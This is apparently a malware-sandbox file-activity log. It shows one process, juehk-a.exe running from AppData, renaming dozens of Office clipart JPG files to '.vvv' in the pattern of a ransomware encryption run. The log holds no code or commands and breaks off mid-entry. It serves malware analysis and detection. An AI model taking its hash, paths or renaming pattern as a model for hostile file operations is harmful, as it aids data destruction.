- sequenceNumber: 2093
- filesize: 14382
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.vvv
- ads:
- fid (ads:): 562949953497786
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95169
- mode: rename
- sequenceNumber: 2094
- filesize: 10094
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.vvv
- ads:
- fid (ads:): 562949953497787
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95182
- mode: rename
- sequenceNumber: 2095
- filesize: 15566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.vvv
- ads:
- fid (ads:): 562949953497790
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95194
- mode: rename
- sequenceNumber: 2096
- filesize: 7582
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.vvv
- ads:
- fid (ads:): 562949953497791
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95224
- mode: rename
- sequenceNumber: 2097
- filesize: 20078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.vvv
- ads:
- fid (ads:): 562949953497792
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95235
- mode: rename
- sequenceNumber: 2098
- filesize: 50910
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.vvv
- ads:
- fid (ads:): 562949953497796
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95247
- mode: rename
- sequenceNumber: 2099
- filesize: 65182
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.vvv
- ads:
- fid (ads:): 562949953497797
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95278
- mode: rename
- sequenceNumber: 2100
- filesize: 44366
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.vvv
- ads:
- fid (ads:): 562949953497798
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95289
- mode: rename
- sequenceNumber: 2101
- filesize: 20606
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.vvv
- ads:
- fid (ads:): 562949953497799
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95301
- mode: rename
- sequenceNumber: 2102
- filesize: 3710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.vvv
- ads:
- fid (ads:): 562949953497816
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95313
- mode: rename
- sequenceNumber: 2103
- filesize: 17166
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.vvv
- ads:
- fid (ads:): 562949953497817
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95324
- mode: rename
- sequenceNumber: 2104
- filesize: 24958
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.vvv
- ads:
- fid (ads:): 562949953497818
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95336
- mode: rename
- sequenceNumber: 2105
- filesize: 9502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.vvv
- ads:
- fid (ads:): 562949953497819
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95346
- mode: rename
- sequenceNumber: 2106
- filesize: 8494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.vvv
- ads:
- fid (ads:): 562949953497820
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95358
- mode: rename
- sequenceNumber: 2107
- filesize: 44318
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.vvv
- ads:
- fid (ads:): 562949953497821
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95465
- mode: rename
- sequenceNumber: 2108
- filesize: 62782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.vvv
- ads:
- fid (ads:): 562949953497822
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95496
- mode: rename
- sequenceNumber: 2109
- filesize: 40654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.vvv
- ads:
- fid (ads:): 562949953498009
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95513
- mode: rename
- sequenceNumber: 2110
- filesize: 34078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.vvv
- ads:
- fid (ads:): 562949953498010
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95525
- mode: rename
- sequenceNumber: 2111
- filesize: 62062
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.vvv
- ads:
- fid (ads:): 562949953498011
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95537
- mode: rename
- sequenceNumber: 2112
- filesize: 49662
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.vvv
- ads:
- fid (ads:): 562949953498012
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95549
- mode: rename
- sequenceNumber: 2113
- filesize: 21550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.vvv
- ads:
- fid (ads:): 562949953498013
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95559
- mode: rename
- sequenceNumber: 2114
- filesize: 18286
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.vvv
- ads:
- fid (ads:): 562949953498014
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95571
- mode: rename
- sequenceNumber: 2115
- filesize: 32270
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.vvv
- ads:
- fid (ads:): 562949953498015
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95583
- mode: rename
- sequenceNumber: 2116
- filesize: 37246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.vvv
- ads:
- fid (ads:): 562949953498016
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95595
- mode: rename
- sequenceNumber: 2117
- filesize: 37214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.vvv
- ads:
- fid (ads:): 562949953498017
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95617
- mode: rename
- sequenceNumber: 2118
- filesize: 35838
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.vvv
- ads:
- fid (ads:): 562949953498018
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95628
- mode: rename
- sequenceNumber: 2119
- filesize: 34382
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.vvv
- ads:
- fid (ads:): 562949953498019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95640
- mode: rename
- sequenceNumber: 2120
- filesize: 39966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.vvv
- ads:
- fid (ads:): 562949953498020
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95651
- mode: rename
- sequenceNumber: 2121
- filesize: 46926
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.vvv
- ads:
- fid (ads:): 562949953498021
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95662
- mode: rename
- sequenceNumber: 2122
- filesize: 44094
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.vvv
- ads:
- fid (ads:): 562949953498022
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95673
- mode: rename
- sequenceNumber: 2123
- filesize: 67966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.vvv
- ads:
- fid (ads:): 562949953498023
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95688
- mode: rename
- sequenceNumber: 2124
- filesize: 38654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.vvv
- ads:
- fid (ads:): 562949953498024
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95700
- mode: rename
- sequenceNumber: 2125
- filesize: 27822
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.vvv
- ads:
- fid (ads:): 562949953498025
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95712
- mode: rename
- sequenceNumber: 2126
- filesize: 65230
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.vvv
- ads:
- fid (ads:): 562949953498026
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95743
- mode: rename
- sequenceNumber: 2127
- filesize: 46910
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.vvv
- ads:
- fid (ads:): 562949953498101
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95755
- mode: rename
- sequenceNumber: 2128
- filesize: 25406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.vvv
- ads:
- fid (ads:): 562949953498111
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95768
- mode: rename
- sequenceNumber: 2129
- filesize: 46878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.vvv
- ads:
- fid (ads:): 562949953498112
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95780
- mode: rename
- sequenceNumber: 2130
- filesize: 14974
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.vvv
- ads:
- fid (ads:): 562949953498113
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95791
- mode: rename
- sequenceNumber: 2131
- filesize: 45774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.vvv
- ads:
- fid (ads:): 562949953498114
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95803
- mode: rename
- sequenceNumber: 2132
- filesize: 55982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.vvv
- ads:
- fid (ads:): 562949953498115
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95815
- mode: rename
- sequenceNumber: 2133
- filesize: 37406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.vvv
- ads:
- fid (ads:): 562949953498116
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95826
- mode: rename
- sequenceNumber: 2134
- filesize: 29630
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.vvv
- ads:
- fid (ads:): 562949953498117
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95852
- mode: rename
- sequenceNumber: 2135
- filesize: 26958
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.vvv
- ads:
- fid (ads:): 562949953498118
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95862
- mode: rename
- sequenceNumber: 2136
- filesize: 24462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.vvv
- ads:
- fid (ads:): 1125899906919431
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95874
- mode: rename
- sequenceNumber: 2137
- filesize: 23758
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.vvv
- ads:
- fid (ads:): 844424930208776
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95885
- mode: rename
- sequenceNumber: 2138
- filesize: 32462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.vvv
- ads:
- fid (ads:): 562949953498121
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95896
- mode: rename
- sequenceNumber: 2139
- filesize: 35758
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.vvv
- ads:
- fid (ads:): 562949953498122
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95908
- mode: rename
- sequenceNumber: 2140
- filesize: 32526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.vvv
- ads:
- fid (ads:): 562949953498123
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95919
- mode: rename
- sequenceNumber: 2141
- filesize: 17038
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.vvv
- ads:
- fid (ads:): 562949953498124
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95933
- mode: rename
- sequenceNumber: 2142
- filesize: 42670
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.vvv
- ads:
- fid (ads:): 562949953498232
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95946
- mode: rename
- sequenceNumber: 2143
- filesize: 43310
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.vvv
- ads:
- fid (ads:): 562949953498249
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95958
- mode: rename
- sequenceNumber: 2144
- filesize: 22046
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.vvv
- ads:
- fid (ads:): 562949953498250
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95970
- mode: rename
- sequenceNumber: 2145
- filesize: 35966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.vvv
- ads:
- fid (ads:): 562949953498259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95995
- mode: rename
- sequenceNumber: 2146
- filesize: 58510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.vvv
- ads:
- fid (ads:): 562949953498260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96013
- mode: rename
- sequenceNumber: 2147
- filesize: 35662
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.vvv
- ads:
- fid (ads:): 562949953498345
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96025
- mode: rename
- sequenceNumber: 2148
- filesize: 17534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.vvv
- ads:
- fid (ads:): 562949953498346
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96043
- mode: rename
- sequenceNumber: 2149
- filesize: 16446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.vvv
- ads:
- fid (ads:): 562949953498347
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96054
- mode: rename
- sequenceNumber: 2150
- filesize: 17774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG
